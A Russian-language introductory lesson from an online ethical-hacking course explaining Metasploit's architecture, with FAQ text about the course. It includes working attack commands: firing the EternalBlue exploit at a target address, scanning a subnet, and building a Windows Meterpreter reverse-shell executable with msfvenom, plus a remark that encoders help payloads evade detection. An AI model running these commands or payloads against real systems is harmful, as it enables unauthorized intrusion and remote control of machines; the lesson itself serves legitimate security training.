Архитектура Metasploit
Модули и консоль
«Архитектура Metasploit» — бесплатный урок Ethical Hacking Academy на CoddyKit. Это урок 1 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Ethical Hacking Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Ethical Hacking Academy содержит 4 уроков всего.
Что такое Metasploit?
Metasploit — наиболее широко используемая платформа для эксплуатации уязвимостей. Она предоставляет структурированную библиотеку эксплойтов, полезных нагрузок и инструментов для проверки и демонстрации уязвимостей в рамках разрешённых работ.
Вместо того чтобы писать каждую атаку с нуля, вы загружаете проверенные модули, настраиваете их и запускаете через единый интерфейс.
msfconsole
Основной интерфейс — msfconsole, интерактивная оболочка командной строки. Она поддерживает автодополнение, историю команд и доступ ко всем модулям.
Вы запускаете её из терминала, а затем полностью работаете внутри её командной строки.
msfconsole
# msf6 > helpТипы модулей
Metasploit организует возможности по типам модулей:
- exploit: код, использующий уязвимость.
- payload: код, запускаемый на цели после эксплуатации.
- auxiliary: сканеры, фаззеры и инструменты, не доставляющие полезную нагрузку.
- post: действия после эксплуатации на скомпрометированном узле.
- encoder и nop: помогают полезным нагрузкам обходить обнаружение.
Именование модулей
Модули используют иерархический путь, который точно описывает их назначение. По пути можно определить тип, платформу и целевую службу.
exploit/windows/smb/ms17_010_eternalblue
# type / platform / service / specific exploitЭксплойты и полезные нагрузки
Важно различать следующие понятия:
- exploit — способ проникновения, взламывающий уязвимое программное обеспечение.
- payload — действие, которое должно произойти после проникновения, например открытие оболочки.
Они используются в связке: один эксплойт может доставлять разные полезные нагрузки в зависимости от вашей цели и целевой системы.
Рабочий процесс с модулем
Работа с любым модулем выполняется по повторяемому циклу:
- выполнить search, чтобы найти модуль;
- выполнить use, чтобы загрузить его;
- задать параметры, например RHOSTS и LHOST;
- выполнить run или exploit.
Именно эта последовательность позволяет платформе масштабироваться на тысячи модулей.
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.5
exploitХранилище данных и параметры
Настройки модуля хранятся в хранилище данных. Каждый параметр может быть обязательным или необязательным.
- RHOSTS: адрес или адреса удалённой цели.
- RPORT: удалённый порт.
- LHOST: ваш адрес для прослушивания обратных соединений.
- LPORT: ваш порт для прослушивания.
Перед запуском выполните show options, чтобы увидеть требования модуля.
База данных
Metasploit интегрируется с базой данных PostgreSQL, в которой хранятся узлы, службы, собранные материалы и учётные данные, обнаруженные во время работ. Это позволяет эффективно отслеживать широкий диапазон целей.
Запустите её до запуска консоли, чтобы результаты записывались автоматически.
msfdb init
# Inside msfconsole:
# db_status hosts services credsВспомогательные модули
Модули auxiliary выполняют полезную работу без эксплуатации уязвимостей: сканируют порты, перечисляют службы, перебирают учётные данные и проводят фаззинг.
Часто они становятся первым шагом: вы собираете необходимые сведения, прежде чем выбрать эксплойт.
use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.10.0/24
runmsfvenom
msfvenom — вспомогательный инструмент для создания автономных полезных нагрузок в виде файлов: исполняемых файлов, скриптов или шелл-кода, который доставляется вне консоли.
Он объединяет создание и кодирование полезной нагрузки в одной команде и полезен для имитации фишинга или специальной доставки в рамках разрешённых проверок.
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=10.10.14.2 LPORT=4444 -f exe -o shell.exeРабочие пространства
При работе с несколькими проектами рабочие пространства Metasploit изолируют узлы, службы и собранные материалы каждого клиента в базе данных. Вы переключаетесь между ними, поэтому данные не смешиваются между проверками.
workspace -a clientA # add a workspace
workspace clientA # switch to it
workspace # list allБыстрая проверка
Проверьте, насколько хорошо вы усвоили типы модулей.
Итоги
Вы изучили архитектуру Metasploit:
- msfconsole — основной интерфейс; msfvenom создаёт автономные полезные нагрузки.
- Типы модулей: exploit, payload, auxiliary, post, encoder/nop.
- Пути модулей кодируют тип, платформу и службу.
- Рабочий процесс: search, use, set options, run; настройки хранятся в хранилище данных.
- База данных PostgreSQL отслеживает узлы, службы и собранные материалы.
Далее: эффективный поиск эксплойтов и работа с ними.
Часто задаваемые вопросы
Урок «Архитектура Metasploit» бесплатный?
Да — полный текст урока «Архитектура Metasploit» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Ethical Hacking Academy, подпишись на CoddyKit PRO. Курс Ethical Hacking Academy содержит 4 уроков всего.
Чему я научусь в уроке «Архитектура Metasploit»?
Модули и консоль Ты практикуешь Ethical Hacking Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.
Нужен ли мне опыт, чтобы начать Ethical Hacking Academy?
Предыдущий опыт не требуется. Ethical Hacking Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 1 из 4.
Сколько времени занимает урок «Архитектура Metasploit»?
Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.
Можно ли писать и запускать код в этом уроке Ethical Hacking Academy?
Да. Каждый урок Ethical Hacking Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.
Все уроки этого курса
- Архитектура Metasploit
- Поиск и использование эксплойтов
- Полезные нагрузки и Meterpreter
- Модули постэксплуатации